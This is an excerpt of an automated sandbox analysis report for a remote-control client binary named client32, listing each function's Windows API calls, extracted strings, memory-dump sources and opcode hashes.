Part of subcall function 11152C8A: __isdigit_l.LIBCMT ref: 11152CAF

RegCloseKey.KERNEL32(00000000), ref: 111345BF

Strings

CurrentVersion, xrefs: 11134534
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 111344BB
Service Pack, xrefs: 11134606
CSDVersion, xrefs: 1113450A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-3310072378
Opcode ID: 7ab92e51ad01e1907d7b427f1449cbf7b293f8cedb1a70cc30572aa3416370ee
Instruction ID: 3b0f4771cf844cdb0b0f75355f5e50aa58b9dccac0828de2761a27a020c1cb56
Opcode Fuzzy Hash: 7ab92e51ad01e1907d7b427f1449cbf7b293f8cedb1a70cc30572aa3416370ee
Instruction Fuzzy Hash: 2D416E79E50215ABDF20CF60CC44FDEFBB49B8531DF100568F91956688E6307940CF91

Function 1108F8C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 1108F8D4
CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?), ref: 1108F8E7
CoCreateInstance.OLE32(?,00000000,00000001,111AC67C,?), ref: 1108F904
CoUninitialize.COMBASE ref: 1108F922

Strings

HNetCfg.FwMgr, xrefs: 1108F8E2
ICF Present: , xrefs: 1108F929

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFromInitializeInstanceProgUninitialize
String ID: HNetCfg.FwMgr$ICF Present:
API String ID: 3222248624-258972079
Opcode ID: e60eba5eeb344acb8759f58af3e6bf86e3ef3d66aa5fb3739c6cfdd7dd58bbd8
Instruction ID: 770ce8111ca66446bd8ca763adae3b9fe85744b9a4d07a8ee584aead76b08d87
Opcode Fuzzy Hash: e60eba5eeb344acb8759f58af3e6bf86e3ef3d66aa5fb3739c6cfdd7dd58bbd8
Instruction Fuzzy Hash: 5801A175F015197FDB00DBB58C49AEFBB78AF05608F10406CFA55D7104EA31EA0087E2

Function 1106DED0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1106E000
_memset.LIBCMT ref: 1106E179

Strings

_License, xrefs: 1106DFC1
serial_no, xrefs: 1106DFBC
NBCTL32.DLL, xrefs: 1106E0B5

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: c3ecfa7420b948e47ebb5e2de70d7ea8b1f3f183f60ef3a79e0d604a368113f0
Instruction ID: 1a78bdd532166b519948713500080bf5a329ee9b8eb99bc9d5adcd4aa2325004
Opcode Fuzzy Hash: c3ecfa7420b948e47ebb5e2de70d7ea8b1f3f183f60ef3a79e0d604a368113f0
Instruction Fuzzy Hash: 7AB19075E00615AFE704CFA8DC81FEEB7F9FF88304F148169E9199B295DA70A941CB90

Function 1102F520 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102CBF0,?,00000000), ref: 1102F544

Strings

NSMWClass, xrefs: 1102F54F
NSMWClass, xrefs: 1102F563
Client32, xrefs: 1102F524

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: 4eab6215739f9884cf541315221468652090f083f0c597e6065554ff95b3bc8c
Instruction ID: c0b43f1959f31bc3ff899fb62870b938a0e0ae705628d7a6d3f14f32828bbd8a
Opcode Fuzzy Hash: 4eab6215739f9884cf541315221468652090f083f0c597e6065554ff95b3bc8c
Instruction Fuzzy Hash: 12F04F74900122DFC706DF69EC94A8DF7A1EF5860CB148539EC1457348EB7069008B95

Function 11096C50 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,?,00000000), ref: 11096C88
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11096CA4
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00AFC318,00AFC318,00AFC318,00AFC318,00AFC318,00AFC318,00AFC318,111DA704,?,00000001,00000001), ref: 11096CD0
EqualSid.ADVAPI32(?,00AFC318,?,00000001,00000001), ref: 11096CE3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID:
API String ID: 1878589025-0
Opcode ID: 3513740187f7c4b306437e11a9b873ce9c80dec7f112a18a8bdffc49cb84d1ba
Instruction ID: aa5dce42b75e03a3a8ef6c037090e6362b52afdfa5aa590746b819f611b8b8b3
Opcode Fuzzy Hash: 3513740187f7c4b306437e11a9b873ce9c80dec7f112a18a8bdffc49cb84d1ba
Instruction Fuzzy Hash: EB215075F01219AFEB00DBA5DD91BFEB7B8EF45704F114069ED29D7180E671A900CBA1

Function 11095790 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,1102E62B,00000000,00000000,00080000,2F623E72,00080000,00000000,00000000), ref: 110957BD
OpenProcessToken.ADVAPI32(00000000), ref: 110957C4
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 110957D5
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 110957F9

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: 0aca1979a8b40330feb026a925631bbf072c9ab4aa1e9dcba116c2c53325dd2e
Instruction ID: 79cce8e325d1ff2264d6913acd6930832bfb3e6363bf0221359440810bb14152
Opcode Fuzzy Hash: 0aca1979a8b40330feb026a925631bbf072c9ab4aa1e9dcba116c2c53325dd2e
Instruction Fuzzy Hash: 15014CB6600219AFD710DF98CC89BAEF7BCFF48705F10456DE90697184DBB06A04CBA1

Function 11095820 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,11096B50,00000244,cant create events), ref: 1109583C
CloseHandle.KERNEL32(?,00000000,11096B50,00000244,cant create events), ref: 11095845

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: bb2189a0ce0e681acf5e2c3f9941def6db024e7673ae4e4681922f78f91d01b4
Instruction ID: 2dc9c20525e0398814adb1e9c50c9e564b761da8d4f29b98c64898ead9ee3d7b
Opcode Fuzzy Hash: bb2189a0ce0e681acf5e2c3f9941def6db024e7673ae4e4681922f78f91d01b4
Instruction Fuzzy Hash: 32E0EC71704211ABE738CF159C94FA777ECAF04B01F11496EF957E6184CA61E8408B64

Function 1102CD80 Relevance: 229.3, APIs: 31, Strings: 99, Instructions: 1762windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

GetSystemMetrics.USER32(00002000), ref: 1102CF04
FindWindowA.USER32(NSMWClass,00000000), ref: 1102D0C5

Part of subcall function 111035C0: GetCurrentThreadId.KERNEL32 ref: 11103656
Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(-00000010,?,1102F49F,00000001,00000000), ref: 11103669
Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(111DC080,?,1102F49F,00000001,00000000), ref: 11103678
Part of subcall function 111035C0: EnterCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110368C
Part of subcall function 111035C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F49F), ref: 111036B2

GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D101
OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102D129
IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102D3E6

Part of subcall function 1108DAC0: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102D158,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DADC
Part of subcall function 1108DAC0: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102D158,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DAE9
Part of subcall function 1108DAC0: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DB19

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102D188
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102D194
CloseHandle.KERNEL32(00000000), ref: 1102D1AC
FindWindowA.USER32(NSMWClass,00000000), ref: 1102D1B9
GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D1DB
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102CF36

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

LoadIconA.USER32(11000000,000004C1), ref: 1102D571
LoadIconA.USER32(11000000,000004C2), ref: 1102D581
DestroyCursor.USER32(00000000), ref: 1102D5AA
DestroyCursor.USER32(00000000), ref: 1102D5BE
GetVersion.KERNEL32(?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DAEF
GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DB42
Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,00000000,?,?,View,Client), ref: 1102E054
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E08E
DispatchMessageA.USER32(?), ref: 1102E098
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E0AA
CloseHandle.KERNEL32(00000000,11025FA0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102E345
GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102E37A
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,00000000), ref: 1102E381
SetWindowPos.USER32(00010486,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102E3B1
CloseHandle.KERNEL32(00000000,11055780,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102E42F
wsprintfA.USER32 ref: 1102E575

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

PostMessageA.USER32(NSMWControl32,00000000,Default,Client,UseIPC,00000001,00000000), ref: 1102E66C
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E680
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E6A6
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E6CC

Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A78400), ref: 11134490
Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF

Strings

Error. Could not load transports - perhaps another client is running, xrefs: 1102E272
NSTWControl32, xrefs: 1102E6B9
RestartAfterError, xrefs: 1102D68F
V11.41.3, xrefs: 1102DF8E
IsILS returned %d, isvistaservice %d, xrefs: 1102D3F5
MiniDumpType, xrefs: 1102D66D
Windows Ding.wav, xrefs: 1102DA66
TracePriv, xrefs: 1102E00C
Default, xrefs: 1102E661, 1102E68D, 1102E6B3
istaService, xrefs: 1102CE1B
General, xrefs: 1102D654, 1102D694, 1102DA03, 1102DA36
NSM.LIC, xrefs: 1102D23D, 1102D2DB
ShowKBEnable, xrefs: 1102D83E
Error. Wrong hardware. Terminating, xrefs: 1102D424
Ready, xrefs: 1102E6CE
Session shutting down, exiting..., xrefs: 1102CF0E
License Control Internal Error, xrefs: 1102D444, 1102D473, 1102D489
NSMWControl32, xrefs: 1102E667
NoFTWhenLoggedOff, xrefs: 1102D9A1
Windows XP, xrefs: 1102DC66
Bridge, xrefs: 1102D1FD
OS2, xrefs: 1102DBED
Windows 2003 x64, xrefs: 1102DCFF
Windows 8, xrefs: 1102DE5F
NSA.LIC, xrefs: 1102D24B, 1102D252, 1102D275
Windows CE, xrefs: 1102DF61
gClient.hNotifyEvent, xrefs: 1102CF4F
cl32main, xrefs: 1102CDB3
Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 1102E944
client32, xrefs: 1102D325, 1102D4AE
AssertTimeout, xrefs: 1102D64F
DisableAudio, xrefs: 1102D6F5, 1102D716, 1102D784, 1102D8EB, 1102D989
Info. Client running as user=%s, type=%d, xrefs: 1102D162
Windows Millennium, xrefs: 1102DBAB
\Explorer.exe, xrefs: 1102E85D
Windows 8 x64, xrefs: 1102DE87
Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 1102E8A6
Windows 8.1 x64, xrefs: 1102DF09
Windows 2008 x64, xrefs: 1102DDCF
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102D2A6
Global\NSMWClassAdmin, xrefs: 1102E56A
DisableJoinClass, xrefs: 1102D873, 1102D911
NSMWClass, xrefs: 1102CEC6, 1102D0A7, 1102D1B4, 1102E55F
580913, xrefs: 1102E18E, 1102E1E3, 1102E226, 1102E30A
AlwaysOnTop, xrefs: 1102E38F
DisableRequestHelp, xrefs: 1102D8A3, 1102D941
win8ui, xrefs: 1102D514
DisableRunplugin, xrefs: 1102D79C
*BeepUsingSpeaker, xrefs: 1102D9FE
Windows 2000, xrefs: 1102DC3B
DisableHelp, xrefs: 1102D9B9
UseLegacyPrintCapture, xrefs: 1102DAD0
EnableSmartcardAuth, xrefs: 1102E4AE
Windows 95, xrefs: 1102DB54
NSSWControl32, xrefs: 1102E693
*PriorityClass, xrefs: 1102E36A
Windows NT, xrefs: 1102DC0E
*StartupDelay, xrefs: 1102E02E
DisableConsoleClient, xrefs: 1102D6C5, 1102D75A
CLIENT32.CPP, xrefs: 1102CF4A, 1102D4C7
Windows 2003, xrefs: 1102DC97
NSMWClassVista, xrefs: 1102CEB5
Windows 7 x64, xrefs: 1102DE2E
Info. Trying to close client, xrefs: 1102D174
UseIPC, xrefs: 1102E59A
*ScreenScrape, xrefs: 1102E0D3, 1102E11C, 1102E34F
Windows Vista, xrefs: 1102DD36
Windows XP Ding.wav, xrefs: 1102DA6D
Info. Client already running, pid=%d (x%x), xrefs: 1102D10F
Windows Vista x64, xrefs: 1102DD67
DisableJournalMenu, xrefs: 1102D8D3, 1102D971
ScreenScrape, xrefs: 1102D7B4, 1102D7DE, 1102D808
pcicl32, xrefs: 1102D094
Windows 8.1, xrefs: 1102DEE3
_debug, xrefs: 1102D519, 1102D672, 1102E5CE
Windows 2008, xrefs: 1102DDA0
DisableAudioFilter, xrefs: 1102D72E, 1102DB0C
Windows XP x64, xrefs: 1102DCC6
_debug, xrefs: 1102E011
EnableGradientCaptions, xrefs: 1102D5FC, 1102D613, 1102D634
Audio, xrefs: 1102D733, 1102DB11
View, xrefs: 1102D215, 1102D601, 1102D618, 1102D639
Windows 2012 R2, xrefs: 1102DF35
DisableReplayMenu, xrefs: 1102D88B, 1102D929
*BeepSound, xrefs: 1102DA31
Windows 7, xrefs: 1102DE06
closed ok, xrefs: 1102D19E
Client, xrefs: 1102D209, 1102D6FA, 1102D71B, 1102D789, 1102D7A1, 1102D7B9, 1102D7E3, 1102D80D, 1102D843, 1102D878, 1102D890, 1102D8A8, 1102D8C0, 1102D8D8, 1102D8F0, 1102D916, 1102D92E, 1102D946, 1102D95E, 1102D976, 1102D98E, 1102D9A6, 1102D9BE, 1102DAD5, 1102E033, 1102E0D8, 1102E121, 1102E300, 1102E354, 1102E36F, 1102E394, 1102E498, 1102E4B3, 1102E59F
TraceIPC, xrefs: 1102E5C9
Windows 98, xrefs: 1102DB85
DisableJournal, xrefs: 1102D8BB, 1102D959
Intel error "%s", xrefs: 1102D474
EnableSmartcardLogon, xrefs: 1102E493
hClientRunning = %x, pid=%d (x%x), xrefs: 1102D1EA
DisableTSAdmin, xrefs: 1102D6DD
Windows 2012, xrefs: 1102DEB8
istaUI, xrefs: 1102CE36
CabinetWClass, xrefs: 1102E7B7
V12.01.3, xrefs: 1102DF95, 1102DFC9

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Process$CloseWindow$HandleOpenPost$CriticalSectionThreadVersionwsprintf$CreateCurrentCursorDestroyEventFindIconInitializeLoadPeekToken_memset$ClassDispatchEnterErrorExitLastMetricsObjectPrioritySendSingleSleepSystemWait__wcstoi64_malloc_strncpy
String ID: *BeepSound$*BeepUsingSpeaker$*PriorityClass$*ScreenScrape$*StartupDelay$580913$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$License Control Internal Error$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$V11.41.3$V12.01.3$View$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
API String ID: 4073474852-2516508800
Opcode ID: e0b6bd059d40e8bf96b5d004e74531d37e7b08b111a0edfbe0187c58173b03f5
